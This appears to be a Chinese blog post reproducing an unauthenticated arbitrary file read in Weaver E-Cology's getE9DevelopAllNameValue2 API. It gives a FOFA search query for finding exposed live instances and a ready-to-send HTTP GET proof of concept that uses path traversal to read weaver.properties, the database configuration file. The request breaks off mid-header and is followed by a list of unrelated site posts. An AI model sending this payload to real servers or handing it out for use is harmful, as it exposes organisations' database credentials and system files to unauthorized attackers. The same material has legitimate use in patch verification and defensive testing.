泛微E-Cology getE9DevelopAllNameValue2 任意文件读取漏洞复现

0x01 产品简介

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微E-Cology 依托全新的设计理念,全新的管理思想。为中大型组织创建全新的高效协同办公环境。能语音办公,简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化,后端7大引擎,满足组织集成化、个性化应用需求。

0x02 漏洞概述

泛微E-Cology getE9DevelopAllNameValue2接口处任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:app="泛微-OA(e-cology)"

0x04 漏洞复现

PoC

GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_/../weaver.properties HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; PPC Mac OS 

最近更新

  1. TCP协议是安全的吗?

    2024-01-29 10:52:01       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-29 10:52:01       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-29 10:52:01       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-29 10:52:01       18 阅读

热门阅读

  1. COMM394 Coding Literacy for Managers

    2024-01-29 10:52:01       30 阅读
  2. docker入门 问题一

    2024-01-29 10:52:01       37 阅读
  3. 状态管理与导航守卫

    2024-01-29 10:52:01       32 阅读
  4. Ubuntu系统桌面卡死,解决办法

    2024-01-29 10:52:01       34 阅读
  5. 计算机视觉(CV)技术的优势和挑战

    2024-01-29 10:52:01       30 阅读
  6. 【漏洞复现】金蝶云星空-AppDesigner-反序列化-rce

    2024-01-29 10:52:01       35 阅读
  7. Vue3+Echarts实现实时曲线及开始与暂停功能

    2024-01-29 10:52:01       30 阅读
  8. Qlik Sense : IntervalMatch(离散匹配)

    2024-01-29 10:52:01       29 阅读
  9. Leetcode 3021. Alice and Bob Playing Flower Game

    2024-01-29 10:52:01       36 阅读